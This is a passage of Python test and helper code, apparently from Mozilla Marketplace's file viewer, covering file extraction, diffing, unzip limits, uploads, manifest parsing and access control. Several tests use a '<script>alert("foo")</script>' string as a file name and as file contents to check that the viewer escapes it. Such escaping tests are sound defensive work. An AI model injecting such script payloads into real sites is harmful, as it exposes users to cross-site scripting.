return [self.left.read_file(allow_empty=True),
self.right.read_file(allow_empty=True)]
def select(self, key):
"""
Select a file and adds the file object to self.one and self.two
for later fetching.
"""
self.key = key
self.left.select(key)
self.right.select(key)
return self.left.selected and self.right.selected
def is_binary(self):
"""Tells you if both selected files are binary."""
return self.left.is_binary() or self.right.is_binary()
def is_diffable(self):
"""Tells you if the selected files are diffable."""
if not self.left.selected and not self.right.selected:
return False
for obj in [self.left, self.right]:
if obj.is_binary():
return False
if obj.is_directory():
return False
return True
def copyfileobj(fsrc, fdst, length=64 * 1024):
"""copy data from file-like object fsrc to file-like object fdst"""
while True:
buf = fsrc.read(length)
if not buf:
break
fdst.write(buf)
def rmtree(prefix):
dirs, files = storage.listdir(prefix)
for fname in files:
storage.delete(os.path.join(prefix, fname))
for d in dirs:
rmtree(os.path.join(prefix, d))
storage.delete(prefix)
########NEW FILE########
__FILENAME__ = test_decorators
from django import http
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from mock import Mock, patch
import amo.tests
from access import acl
from files.decorators import allowed
class AllowedTest(amo.tests.TestCase):
def setUp(self):
self.request = Mock()
self.file = Mock()
@patch.object(acl, 'check_reviewer', lambda x: True)
def test_reviewer_allowed(self):
self.assertTrue(allowed(self.request, self.file))
@patch.object(acl, 'check_reviewer', lambda x: False)
def test_reviewer_unallowed(self):
self.assertRaises(PermissionDenied, allowed, self.request, self.file)
@patch.object(acl, 'check_reviewer', lambda x: False)
def test_addon_not_found(self):
class MockVersion():
@property
def addon(self):
raise ObjectDoesNotExist
self.file.version = MockVersion()
self.assertRaises(http.Http404, allowed, self.request, self.file)
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
import os
import zipfile
from django import forms
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from mock import Mock, patch
from nose.tools import eq_
import amo.tests
from files.utils import SafeUnzip
from mkt.files.helpers import FileViewer, DiffHelper
root = os.path.join(settings.ROOT, 'apps/files/fixtures/files')
get_file = lambda x: '%s/%s' % (root, x)
def make_file(pk, file_path, **kwargs):
obj = Mock()
obj.id = pk
for k, v in kwargs.items():
setattr(obj, k, v)
obj.file_path = file_path
obj.__str__ = lambda x: x.pk
obj.version = Mock()
obj.version.version = 1
return obj
# TODO: It'd be nice if these used packaged app examples but these addons still
# flex the code so it wasn't converted.
class TestFileHelper(amo.tests.TestCase):
def setUp(self):
self.viewer = FileViewer(make_file(1, get_file('dictionary-test.xpi')))
def tearDown(self):
self.viewer.cleanup()
def test_files_not_extracted(self):
eq_(self.viewer.is_extracted(), False)
def test_files_extracted(self):
self.viewer.extract()
eq_(self.viewer.is_extracted(), True)
def test_recurse_extract(self):
self.viewer.src = get_file('recurse.xpi')
self.viewer.extract()
eq_(self.viewer.is_extracted(), True)
def test_recurse_contents(self):
self.viewer.src = get_file('recurse.xpi')
self.viewer.extract()
files = self.viewer.get_files()
nm = ['recurse/recurse.xpi/chrome/test-root.txt',
'recurse/somejar.jar/recurse/recurse.xpi/chrome/test.jar',
'recurse/somejar.jar/recurse/recurse.xpi/chrome/test.jar/test']
for name in nm:
eq_(name in files, True, 'File %r not extracted' % name)
def test_cleanup(self):
self.viewer.extract()
self.viewer.cleanup()
eq_(self.viewer.is_extracted(), False)
def test_truncate(self):
truncate = self.viewer.truncate
for x, y in (['foo.rdf', 'foo.rdf'],
['somelongfilename.rdf', 'somelongfilenam...rdf'],
[u'unicode삮.txt', u'unicode\uc0ae.txt'],
[u'unicodesomelong삮.txt', u'unicodesomelong...txt'],
['somelongfilename.somelongextension',
'somelongfilenam...somelonge..'],):
eq_(truncate(x), y)
def test_get_files_not_extracted(self):
assert not self.viewer.get_files()
def test_get_files_size(self):
self.viewer.extract()
files = self.viewer.get_files()
eq_(len(files), 14)
def test_get_files_directory(self):
self.viewer.extract()
files = self.viewer.get_files()
eq_(files['install.js']['directory'], False)
eq_(files['install.js']['binary'], False)
eq_(files['__MACOSX']['directory'], True)
eq_(files['__MACOSX']['binary'], False)
def test_url_file(self):
self.viewer.extract()
files = self.viewer.get_files()
url = reverse('mkt.files.list', args=[self.viewer.file.id, 'file',
'install.js'])
assert files['install.js']['url'].endswith(url)
def test_get_files_depth(self):
self.viewer.extract()
files = self.viewer.get_files()
eq_(files['dictionaries/license.txt']['depth'], 1)
def test_bom(self):
dest = os.path.join(settings.TMP_PATH, 'test_bom')
open(dest, 'w').write('foo'.encode('utf-16'))
self.viewer.select('foo')
self.viewer.selected = {'full': dest, 'size': 1}
eq_(self.viewer.read_file(), u'foo')
os.remove(dest)
def test_syntax(self):
for filename, syntax in [('foo.rdf', 'xml'),
('foo.xul', 'xml'),
('foo.json', 'js'),
('foo.jsm', 'js'),
('foo.js', 'js'),
('manifest.webapp', 'js'),
('foo.html', 'html'),
('foo.css', 'css'),
('foo.bar', 'plain')]:
eq_(self.viewer.get_syntax(filename), syntax)
def test_file_order(self):
self.viewer.extract()
dest = self.viewer.dest
open(os.path.join(dest, 'chrome.manifest'), 'w')
subdir = os.path.join(dest, 'chrome')
os.mkdir(subdir)
open(os.path.join(subdir, 'foo'), 'w')
cache.clear()
files = self.viewer.get_files().keys()
rt = files.index(u'chrome')
eq_(files[rt:rt + 3], [u'chrome', u'chrome/foo', u'dictionaries'])
@patch.object(settings, 'FILE_VIEWER_SIZE_LIMIT', 5)
def test_file_size(self):
self.viewer.extract()
self.viewer.get_files()
self.viewer.select('install.js')
res = self.viewer.read_file()
eq_(res, '')
assert self.viewer.selected['msg'].startswith('File size is')
@patch.object(settings, 'FILE_VIEWER_SIZE_LIMIT', 5)
def test_file_size_unicode(self):
with self.activate(locale='he'):
self.viewer.extract()
self.viewer.get_files()
self.viewer.select('install.js')
res = self.viewer.read_file()
eq_(res, '')
assert self.viewer.selected['msg'].startswith('File size is')
@patch.object(settings, 'FILE_UNZIP_SIZE_LIMIT', 5)
def test_contents_size(self):
self.assertRaises(forms.ValidationError, self.viewer.extract)
def test_default(self):
eq_(self.viewer.get_default(None), 'manifest.webapp')
def test_delete_mid_read(self):
self.viewer.extract()
self.viewer.select('install.js')
os.remove(os.path.join(self.viewer.dest, 'install.js'))
res = self.viewer.read_file()
eq_(res, '')
assert self.viewer.selected['msg'].startswith('That file no')
@patch('mkt.files.helpers.get_md5')
def test_delete_mid_tree(self, get_md5):
get_md5.side_effect = IOError('ow')
self.viewer.extract()
eq_({}, self.viewer.get_files())
class TestDiffHelper(amo.tests.TestCase):
def setUp(self):
src = os.path.join(settings.ROOT, get_file('dictionary-test.xpi'))
self.helper = DiffHelper(make_file(1, src), make_file(2, src))
def tearDown(self):
self.helper.cleanup()
def test_files_not_extracted(self):
eq_(self.helper.is_extracted(), False)
def test_files_extracted(self):
self.helper.extract()
eq_(self.helper.is_extracted(), True)
def test_get_files(self):
eq_(self.helper.left.get_files(),
self.helper.get_files())
def test_diffable(self):
self.helper.extract()
self.helper.select('install.js')
assert self.helper.is_diffable()
def test_diffable_one_missing(self):
self.helper.extract()
os.remove(os.path.join(self.helper.right.dest, 'install.js'))
self.helper.select('install.js')
assert self.helper.is_diffable()
def test_diffable_allow_empty(self):
self.helper.extract()
self.assertRaises(AssertionError, self.helper.right.read_file)
eq_(self.helper.right.read_file(allow_empty=True), '')
def test_diffable_both_missing(self):
self.helper.extract()
self.helper.select('foo.js')
assert not self.helper.is_diffable()
def test_diffable_deleted_files(self):
self.helper.extract()
os.remove(os.path.join(self.helper.left.dest, 'install.js'))
eq_('install.js' in self.helper.get_deleted_files(), True)
def test_diffable_one_binary_same(self):
self.helper.extract()
self.helper.select('install.js')
self.helper.left.selected['binary'] = True
assert self.helper.is_binary()
def test_diffable_one_binary_diff(self):
self.helper.extract()
self.change(self.helper.left.dest, 'asd')
cache.clear()
self.helper.select('install.js')
self.helper.left.selected['binary'] = True
assert self.helper.is_binary()
def test_diffable_two_binary_diff(self):
self.helper.extract()
self.change(self.helper.left.dest, 'asd')
self.change(self.helper.right.dest, 'asd123')
cache.clear()
self.helper.select('install.js')
self.helper.left.selected['binary'] = True
self.helper.right.selected['binary'] = True
assert self.helper.is_binary()
def test_diffable_one_directory(self):
self.helper.extract()
self.helper.select('install.js')
self.helper.left.selected['directory'] = True
assert not self.helper.is_diffable()
assert self.helper.left.selected['msg'].startswith('This file')
def test_diffable_parent(self):
self.helper.extract()
self.change(self.helper.left.dest, 'asd',
filename='__MACOSX/._dictionaries')
cache.clear()
files = self.helper.get_files()
eq_(files['__MACOSX/._dictionaries']['diff'], True)
eq_(files['__MACOSX']['diff'], True)
def change(self, file, text, filename='install.js'):
path = os.path.join(file, filename)
data = open(path, 'r').read()
data += text
open(path, 'w').write(data)
class TestSafeUnzipFile(amo.tests.TestCase, amo.tests.AMOPaths):
#TODO(andym): get full coverage for existing SafeUnzip methods, most
# is covered in the file viewer tests.
@patch.object(settings, 'FILE_UNZIP_SIZE_LIMIT', 5)
def test_unzip_limit(self):
zip = SafeUnzip(self.xpi_path('langpack-localepicker'))
self.assertRaises(forms.ValidationError, zip.is_valid)
def test_unzip_fatal(self):
zip = SafeUnzip(self.xpi_path('search.xml'))
self.assertRaises(zipfile.BadZipfile, zip.is_valid)
def test_unzip_not_fatal(self):
zip = SafeUnzip(self.xpi_path('search.xml'))
assert not zip.is_valid(fatal=False)
def test_extract_path(self):
zip = SafeUnzip(self.xpi_path('langpack-localepicker'))
assert zip.is_valid()
assert'locale browser de' in zip.extract_path('chrome.manifest')
def test_not_secure(self):
zip = SafeUnzip(self.xpi_path('extension'))
zip.is_valid()
assert not zip.is_signed()
def test_is_secure(self):
zip = SafeUnzip(self.xpi_path('signed'))
zip.is_valid()
assert zip.is_signed()
def test_is_broken(self):
zip = SafeUnzip(self.xpi_path('signed'))
zip.is_valid()
zip.info[2].filename = 'META-INF/foo.sf'
assert not zip.is_signed()
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import hashlib
import json
import os
from django.conf import settings
from django.core.files.storage import default_storage as storage
import amo
import amo.tests
import mock
import path
from nose.tools import eq_
from addons.models import Addon
from files.models import File, FileUpload, FileValidation, nfd_str, Platform
from versions.models import Version
from mkt.files.helpers import copyfileobj
from mkt.site.fixtures import fixture
class UploadTest(amo.tests.TestCase, amo.tests.AMOPaths):
"""
Base for tests that mess with file uploads, safely using temp directories.
"""
fixtures = ['applications/all_apps.json', 'base/appversion']
def setUp(self):
self._rename = path.path.rename
path.path.rename = path.path.copy
def tearDown(self):
path.path.rename = self._rename
def file_path(self, *args, **kw):
return self.file_fixture_path(*args, **kw)
def get_upload(self, filename=None, abspath=None, validation=None,
is_webapp=False):
zip = open(abspath if abspath else self.file_path(filename)).read()
upload = FileUpload.from_post([zip], filename=abspath or filename,
size=1234)
# Simulate what fetch_manifest() does after uploading an app.
upload.is_webapp = is_webapp
upload.validation = (validation or
json.dumps(dict(errors=0, warnings=1, notices=2,
metadata={}, messages=[])))
upload.save()
return upload
class TestFileUpload(UploadTest):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestFileUpload, self).setUp()
self.data = 'file contents'
def upload(self):
# The data should be in chunks.
data = [''.join(x) for x in amo.utils.chunked(self.data, 3)]
return FileUpload.from_post(data, 'filename.zip', len(self.data))
def test_from_post_write_file(self):
eq_(storage.open(self.upload().path).read(), self.data)
def test_from_post_filename(self):
eq_(self.upload().name, 'filename.zip')
def test_from_post_hash(self):
hash = hashlib.sha256(self.data).hexdigest()
eq_(self.upload().hash, 'sha256:%s' % hash)
def test_save_without_validation(self):
f = FileUpload.objects.create()
assert not f.valid
def test_save_with_validation(self):
f = FileUpload.objects.create(
validation='{"errors": 0, "metadata": {}}')
assert f.valid
f = FileUpload.objects.create(validation='wtf')
assert not f.valid
def test_update_with_validation(self):
f = FileUpload.objects.create()
f.validation = '{"errors": 0, "metadata": {}}'
f.save()
assert f.valid
def test_update_without_validation(self):
f = FileUpload.objects.create()
f.save()
assert not f.valid
def test_ascii_names(self):
fu = FileUpload.from_post('', u'mözball.zip', 0)
assert 'zip' in fu.name
fu = FileUpload.from_post('', u'мозила_србија-0.11.zip', 0)
assert 'zip' in fu.name
fu = FileUpload.from_post('', u'フォクすけといっしょ.zip', 0)
assert 'zip' in fu.name
fu = FileUpload.from_post('', u'\u05d0\u05d5\u05e1\u05e3.zip', 0)
assert 'zip' in fu.name
class TestFileFromUpload(UploadTest):
fixtures = ['base/apps']
def setUp(self):
super(TestFileFromUpload, self).setUp()
self.platform = Platform.objects.get(id=amo.PLATFORM_ALL.id)
self.addon = Addon.objects.create(type=amo.ADDON_WEBAPP,
name='app name')
self.version = Version.objects.create(addon=self.addon)
def upload(self, name):
if os.path.splitext(name)[-1] not in ['.webapp', '.zip']:
name = name + '.zip'
v = json.dumps(dict(errors=0, warnings=1, notices=2, metadata={}))
fname = nfd_str(self.packaged_app_path(name))
if not storage.exists(fname):
with storage.open(fname, 'w') as fs:
copyfileobj(open(fname), fs)
d = dict(path=fname, name=name,
hash='sha256:%s' % name, validation=v)
return FileUpload.objects.create(**d)
def test_filename_hosted(self):
upload = self.upload('mozball')
f = File.from_upload(upload, self.version, self.platform)
eq_(f.filename, 'app-name-0.1.webapp')
def test_filename_packaged(self):
self.addon.is_packaged = True
upload = self.upload('mozball')
f = File.from_upload(upload, self.version, self.platform)
eq_(f.filename, 'app-name-0.1.zip')
def test_file_validation(self):
upload = self.upload('mozball')
file = File.from_upload(upload, self.version, self.platform)
fv = FileValidation.objects.get(file=file)
eq_(fv.validation, upload.validation)
eq_(fv.valid, True)
eq_(fv.errors, 0)
eq_(fv.warnings, 1)
eq_(fv.notices, 2)
def test_file_hash(self):
upload = self.upload('mozball')
f = File.from_upload(upload, self.version, self.platform)
assert f.hash.startswith('sha256:')
assert len(f.hash) == 64 + 7 # 64 for hash, 7 for 'sha256:'
def test_utf8(self):
upload = self.upload(u'mozball')
self.version.addon.name = u'mözball'
f = File.from_upload(upload, self.version, self.platform)
eq_(f.filename, u'app-name-0.1.webapp')
def test_size(self):
upload = self.upload('mozball')
f = File.from_upload(upload, self.version, self.platform)
eq_(f.size, 93594)
def test_file_hash_paranoia(self):
upload = self.upload('mozball')
f = File.from_upload(upload, self.version, self.platform)
assert f.hash.startswith('sha256:ad85d6316166d46')
class TestFile(amo.tests.TestCase, amo.tests.AMOPaths):
"""
Tests the methods of the File model.
"""
fixtures = fixture('webapp_337141')
def test_get_absolute_url(self):
f = File.objects.get()
url = f.get_absolute_url(src='src')
expected = '/downloads/file/81555/steamcube.webapp?src=src'
assert url.endswith(expected), url
def check_delete(self, file_, filename):
"""Test that when the File object is deleted, it is removed from the
filesystem."""
try:
with storage.open(filename, 'w') as f:
f.write('sample data\n')
assert storage.exists(filename)
file_.delete()
assert not storage.exists(filename)
finally:
if storage.exists(filename):
storage.delete(filename)
def test_delete_by_version(self):
f = File.objects.get()
version = f.version
self.check_delete(version, f.file_path)
def test_delete_file_path(self):
f = File.objects.get()
self.check_delete(f, f.file_path)
def test_delete_no_file(self):
"""Test that the file object can be deleted without the file being
present."""
f = File.objects.get()
filename = f.file_path
assert not os.path.exists(filename), 'File exists at: %s' % filename
f.delete()
def test_delete_signal(self):
"""Test that if there's no filename, the signal is ok."""
f = File.objects.get()
f.update(filename='')
f.delete()
@mock.patch('files.models.File.hide_disabled_file')
def test_disable_signal(self, hide_mock):
f = File.objects.get()
f.status = amo.STATUS_PUBLIC
f.save()
assert not hide_mock.called
f.status = amo.STATUS_DISABLED
f.save()
assert hide_mock.called
@mock.patch('files.models.File.unhide_disabled_file')
def test_unhide_on_enable(self, unhide_mock):
f = File.objects.get()
f.status = amo.STATUS_PUBLIC
f.save()
assert not unhide_mock.called
f = File.objects.get()
f.status = amo.STATUS_DISABLED
f.save()
assert not unhide_mock.called
f = File.objects.get()
f.status = amo.STATUS_PUBLIC
f.save()
assert unhide_mock.called
def test_unhide_disabled_files(self):
f = File.objects.get()
f.status = amo.STATUS_PUBLIC
with storage.open(f.guarded_file_path, 'wb') as fp:
fp.write('some data\n')
f.unhide_disabled_file()
assert storage.exists(f.file_path)
assert storage.open(f.file_path).size
def test_generate_filename(self):
f = File.objects.get()
eq_(f.generate_filename(), 'something-something-1.0.webapp')
def test_generate_filename_packaged_app(self):
f = File.objects.get()
f.version.addon.app_slug = 'testing-123'
f.version.addon.type = amo.ADDON_WEBAPP
f.version.addon.is_packaged = True
eq_(f.generate_filename(), 'testing-123-1.0.zip')
def test_generate_webapp_fn_non_ascii(self):
f = File()
f.version = Version(version='0.1.7')
f.version.compatible_apps = (amo.FIREFOX,)
f.version.addon = Addon(app_slug=u' フォクすけ といっしょ',
type=amo.ADDON_WEBAPP)
eq_(f.generate_filename(), 'app-0.1.7.webapp')
def test_generate_webapp_fn_partial_non_ascii(self):
f = File()
f.version = Version(version='0.1.7')
f.version.compatible_apps = (amo.FIREFOX,)
f.version.addon = Addon(app_slug=u'myapp フォクすけ といっしょ',
type=amo.ADDON_WEBAPP)
eq_(f.generate_filename(), 'myapp-0.1.7.webapp')
def test_generate_filename_ja(self):
f = File()
f.version = Version(version='0.1.7')
f.version.addon = Addon(name=u' フォクすけ といっしょ')
eq_(f.generate_filename(), 'none-0.1.7.webapp')
def clean_files(self, f):
if not storage.exists(f.file_path):
with storage.open(f.file_path, 'w') as fp:
fp.write('sample data\n')
def test_generate_hash(self):
f = File()
f.version = Version.objects.get()
fn = self.packaged_app_path('mozball.zip')
assert f.generate_hash(fn).startswith('sha256:ad85d6316166d4')
def test_addon(self):
f = File.objects.get()
addon_id = f.version.addon_id
addon = Addon.objects.no_cache().get(pk=addon_id)
addon.update(status=amo.STATUS_DELETED)
eq_(f.addon.id, addon_id)
class TestSignedPath(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.file_ = File.objects.get(pk=81555)
def test_path(self):
path = (self.file_.file_path
.replace('.webapp', '.signed.webapp')
.replace(settings.ADDONS_PATH, settings.SIGNED_APPS_PATH))
eq_(self.file_.signed_file_path, path)
def test_reviewer_path(self):
path = (self.file_.file_path
.replace('.webapp', '.signed.webapp')
.replace(settings.ADDONS_PATH,
settings.SIGNED_APPS_REVIEWER_PATH))
eq_(self.file_.signed_reviewer_file_path, path)
########NEW FILE########
__FILENAME__ = test_utils_
import mock
from nose.tools import eq_
from django import forms
import amo.tests
from files.utils import WebAppParser
class TestWebAppParser(amo.tests.TestCase):
@mock.patch('files.utils.WebAppParser.get_json_data')
def test_no_developer_name(self, get_json_data):
get_json_data.return_value = {
'name': 'Blah'
}
with self.assertRaises(forms.ValidationError) as e:
# The argument to parse() is supposed to be a filename, it doesn't
# matter here though since we are mocking get_json_data().
WebAppParser().parse('')
eq_(e.exception.messages, ["Developer name is required in the manifest"
" in order to display it on the app's "
"listing."])
@mock.patch('files.utils.WebAppParser.get_json_data')
def test_empty_developer_object(self, get_json_data):
get_json_data.return_value = {
'name': 'Blah',
'developer': {}
}
with self.assertRaises(forms.ValidationError) as e:
# The argument to parse() is supposed to be a filename, it doesn't
# matter here though since we are mocking get_json_data().
WebAppParser().parse('')
eq_(e.exception.messages, ["Developer name is required in the manifest"
" in order to display it on the app's "
"listing."])
@mock.patch('files.utils.WebAppParser.get_json_data')
def test_developer_name(self, get_json_data):
get_json_data.return_value = {
'name': 'Blah',
'developer': {
'name': 'Mozilla Marketplace Testing'
}
}
# The argument to parse() is supposed to be a filename, it doesn't
# matter here though since we are mocking get_json_data().
parsed_results = WebAppParser().parse('')
eq_(parsed_results['developer_name'], 'Mozilla Marketplace Testing')
@mock.patch('files.utils.WebAppParser.get_json_data')
def test_name_with_translations(self, get_json_data):
get_json_data.return_value = {
'name': 'Blah',
'developer': {
'name': 'Mozilla Marketplace Testing'
},
'default_locale': 'en-US',
'locales': {
'fr': {
'name': 'Blah (fr)',
},
'es': {
'name': 'Blah (es)',
}
}
}
# The argument to parse() is supposed to be a filename, it doesn't
# matter here though since we are mocking get_json_data().
parsed_results = WebAppParser().parse('')
eq_(parsed_results['name'].get('fr'), 'Blah (fr)')
eq_(parsed_results['name'].get('es'), 'Blah (es)')
eq_(parsed_results['name'].get('en-US'), 'Blah')
eq_(parsed_results['name'].get('de'), None)
eq_(parsed_results['default_locale'], 'en-US')
@mock.patch('files.utils.WebAppParser.get_json_data')
def test_name_with_translations_fallback(self, get_json_data):
get_json_data.return_value = {
'name': 'Blah',
'description': 'Blah Description',
'developer': {
'name': 'Mozilla Marketplace Testing'
},
'default_locale': 'en-US',
'locales': {
'fr': {
'description': 'Blah Description (fr)',
},
'es': {
'name': 'Blah (es)',
}
}
}
# The argument to parse() is supposed to be a filename, it doesn't
# matter here though since we are mocking get_json_data().
parsed_results = WebAppParser().parse('')
eq_(parsed_results['name'].get('fr'), 'Blah') # Falls back to default.
eq_(parsed_results['name'].get('es'), 'Blah (es)')
eq_(parsed_results['name'].get('en-US'), 'Blah')
eq_(parsed_results['name'].get('de'), None)
eq_(parsed_results['default_locale'], 'en-US')
########NEW FILE########
__FILENAME__ = test_views
import json
import os
import shutil
import urlparse
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.utils.http import http_date
from mock import patch
from nose import SkipTest
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from cache_nuggets.lib import Message
from files.models import File
from mkt.files.helpers import DiffHelper, FileViewer
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from users.models import UserProfile
packaged_app = 'mkt/submit/tests/packaged/full-tpa.zip'
not_binary = 'manifest.webapp'
binary = 'icons/256.png'
class FilesBase(object):
def login_as_editor(self):
assert self.client.login(username='[email protected]',
password='password')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
self.app.update(is_packaged=True, status=amo.WEBAPPS_UNREVIEWED_STATUS)
self.dev = self.app.authors.all()[0]
self.regular = UserProfile.objects.get(pk=999)
self.version = self.app.versions.latest()
self.file = self.version.all_files[0]
self.versions = [self.version,
self.app.versions.create(
version='%s.1' % self.version.version)]
self.files = [self.file,
File.objects.create(version=self.versions[1],
filename='webapp.zip')]
self.login_as_editor()
for file_obj in self.files:
src = os.path.join(settings.ROOT, packaged_app)
try:
os.makedirs(os.path.dirname(file_obj.file_path))
except OSError:
pass
shutil.copyfile(src, file_obj.file_path)
self.file_viewer = FileViewer(self.file)
def tearDown(self):
self.file_viewer.cleanup()
def files_redirect(self, file):
return reverse('mkt.files.redirect', args=[self.file.pk, file])
def files_serve(self, file):
return reverse('mkt.files.serve', args=[self.file.pk, file])
def test_view_access_anon(self):
self.client.logout()
self.check_urls(403)
def test_view_access_anon_view_unreviewed_source(self):
self.app.update(view_source=True)
self.file_viewer.extract()
self.client.logout()
self.check_urls(403)
def test_view_access_anon_view_source(self):
self.app.update(view_source=True, status=amo.STATUS_PUBLIC)
self.file_viewer.extract()
self.client.logout()
self.check_urls(200)
def test_view_access_editor(self):
self.file_viewer.extract()
self.check_urls(200)
def test_view_access_editor_view_source(self):
self.app.update(view_source=True)
self.file_viewer.extract()
self.check_urls(200)
def test_view_access_developer(self):
self.client.logout()
assert self.client.login(username=self.dev.email, password='password')
self.file_viewer.extract()
self.check_urls(200)
def test_view_access_reviewed(self):
self.app.update(view_source=True)
self.file_viewer.extract()
self.client.logout()
for status in amo.UNREVIEWED_STATUSES:
self.app.update(status=status)
self.check_urls(403)
for status in amo.REVIEWED_STATUSES:
self.app.update(status=status)
self.check_urls(200)
def test_view_access_developer_view_source(self):
self.client.logout()
assert self.client.login(username=self.dev.email, password='password')
self.app.update(view_source=True)
self.file_viewer.extract()
self.check_urls(200)
def test_view_access_another_developer(self):
self.client.logout()
assert self.client.login(username=self.regular.email,
password='password')
self.file_viewer.extract()
self.check_urls(403)
def test_view_access_another_developer_view_source(self):
self.client.logout()
assert self.client.login(username=self.regular.email,
password='password')
self.app.update(view_source=True, status=amo.STATUS_PUBLIC)
self.file_viewer.extract()
self.check_urls(200)
def test_poll_extracted(self):
self.file_viewer.extract()
res = self.client.get(self.poll_url())
eq_(res.status_code, 200)
eq_(json.loads(res.content)['status'], True)
def test_poll_not_extracted(self):
res = self.client.get(self.poll_url())
eq_(res.status_code, 200)
eq_(json.loads(res.content)['status'], False)
def test_poll_extracted_anon(self):
self.client.logout()
res = self.client.get(self.poll_url())
eq_(res.status_code, 403)
def test_content_headers(self):
self.file_viewer.extract()
res = self.client.get(self.file_url('manifest.webapp'))
assert 'etag' in res._headers
assert 'last-modified' in res._headers
def test_content_headers_etag(self):
self.file_viewer.extract()
self.file_viewer.select('manifest.webapp')
obj = getattr(self.file_viewer, 'left', self.file_viewer)
etag = obj.selected.get('md5')
res = self.client.get(self.file_url('manifest.webapp'),
HTTP_IF_NONE_MATCH=etag)
eq_(res.status_code, 304)
def test_content_headers_if_modified(self):
self.file_viewer.extract()
self.file_viewer.select('manifest.webapp')
obj = getattr(self.file_viewer, 'left', self.file_viewer)
date = http_date(obj.selected.get('modified'))
res = self.client.get(self.file_url('manifest.webapp'),
HTTP_IF_MODIFIED_SINCE=date)
eq_(res.status_code, 304)
def test_file_header(self):
self.file_viewer.extract()
res = self.client.get(self.file_url(not_binary))
eq_(res.status_code, 200)
url = res.context['file_link']['url']
eq_(url, reverse('reviewers.apps.review', args=[self.app.app_slug]))
def test_file_header_anon(self):
self.client.logout()
self.file_viewer.extract()
self.app.update(view_source=True, status=amo.STATUS_PUBLIC)
res = self.client.get(self.file_url(not_binary))
eq_(res.status_code, 200)
url = res.context['file_link']['url']
eq_(url, reverse('detail', args=[self.app.pk]))
def test_content_no_file(self):
self.file_viewer.extract()
res = self.client.get(self.file_url())
doc = pq(res.content)
eq_(len(doc('#content')), 0)
def test_no_files(self):
self.file_viewer.cleanup()
res = self.client.get(self.file_url())
eq_(res.status_code, 200)
assert 'files' in res.context
def test_files(self):
self.file_viewer.extract()
res = self.client.get(self.file_url())
eq_(res.status_code, 200)
assert 'files' in res.context
def test_files_anon(self):
self.client.logout()
res = self.client.get(self.file_url())
eq_(res.status_code, 403)
def test_files_file(self):
self.file_viewer.extract()
res = self.client.get(self.file_url(not_binary))
eq_(res.status_code, 200)
assert 'selected' in res.context
def test_files_back_link(self):
self.file_viewer.extract()
res = self.client.get(self.file_url(not_binary))
doc = pq(res.content)
eq_(doc('#commands td:last').text(), 'Back to review')
def test_files_back_link_anon(self):
self.file_viewer.extract()
self.client.logout()
self.app.update(view_source=True, status=amo.STATUS_PUBLIC)
res = self.client.get(self.file_url(not_binary))
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('#commands td:last').text(), 'Back to app')
def test_diff_redirect(self):
ids = self.files[0].id, self.files[1].id
res = self.client.post(self.file_url(),
{'left': ids[0], 'right': ids[1]})
eq_(res.status_code, 302)
self.assert3xx(res, reverse('mkt.files.compare', args=ids))
def test_browse_redirect(self):
ids = self.files[0].id,
res = self.client.post(self.file_url(), {'left': ids[0]})
eq_(res.status_code, 302)
self.assert3xx(res, reverse('mkt.files.list', args=ids))
def test_browse_deleted_version(self):
self.file.version.delete()
res = self.client.post(self.file_url(), {'left': self.file.id})
eq_(res.status_code, 404)
def test_file_chooser(self):
res = self.client.get(self.file_url())
doc = pq(res.content)
left = doc('#id_left')
eq_(len(left), 1)
vers = left('option')
eq_(len(vers), 3)
# Only one file per version on Marketplace for the time being.
eq_(vers.eq(0).text(), '')
f = self.versions[1].all_files[0]
eq_(vers.eq(1).text(), '%s (%s)' % (self.versions[1].version,
amo.STATUS_CHOICES_API[f.status]))
f = self.versions[0].all_files[0]
eq_(vers.eq(2).text(), '%s (%s)' % (self.versions[0].version,
amo.STATUS_CHOICES_API[f.status]))
class TestFileViewer(FilesBase, amo.tests.WebappTestCase):
fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')
def poll_url(self):
return reverse('mkt.files.poll', args=[self.file.pk])
def file_url(self, file=None):
args = [self.file.pk]
if file:
args.extend(['file', file])
return reverse('mkt.files.list', args=args)
def check_urls(self, status):
for url in [self.poll_url(), self.file_url()]:
status_code = self.client.get(url).status_code
assert status_code == status, (
'Request to %s returned status code %d (expected %d)' %
(url, status_code, status))
def add_file(self, name, contents):
dest = os.path.join(self.file_viewer.dest, name)
open(dest, 'w').write(contents)
def test_files_xss(self):
self.file_viewer.extract()
self.add_file('<script>alert("foo")', '')
res = self.client.get(self.file_url())
eq_(res.status_code, 200)
doc = pq(res.content)
# Note: this is text, not a DOM element, so escaped correctly.
assert '<script>alert("' in doc('#files li a').text()
def test_content_file(self):
self.file_viewer.extract()
res = self.client.get(self.file_url('manifest.webapp'))
doc = pq(res.content)
eq_(len(doc('#content')), 1)
def test_content_no_file(self):
self.file_viewer.extract()
res = self.client.get(self.file_url())
doc = pq(res.content)
eq_(len(doc('#content')), 1)
eq_(res.context['key'], 'manifest.webapp')
def test_content_xss(self):
self.file_viewer.extract()
for name in ['file.txt', 'file.html', 'file.htm']:
# If you are adding files, you need to clear out the memcache
# file listing.
cache.clear()
self.add_file(name, '<script>alert("foo")</script>')
res = self.client.get(self.file_url(name))
doc = pq(res.content)
# Note: this is text, not a DOM element, so escaped correctly.
assert doc('#content').text().startswith('<script')
def test_binary(self):
self.file_viewer.extract()
self.add_file('file.php', '<script>alert("foo")</script>')
res = self.client.get(self.file_url('file.php'))
eq_(res.status_code, 200)
assert self.file_viewer.get_files()['file.php']['md5'] in res.content
def test_tree_no_file(self):
self.file_viewer.extract()
res = self.client.get(self.file_url('doesnotexist.js'))
eq_(res.status_code, 404)
def test_directory(self):
self.file_viewer.extract()
res = self.client.get(self.file_url('doesnotexist.js'))
eq_(res.status_code, 404)
def test_serve_no_token(self):
self.file_viewer.extract()
res = self.client.get(self.files_serve(binary))
eq_(res.status_code, 403)
def test_serve_fake_token(self):
self.file_viewer.extract()
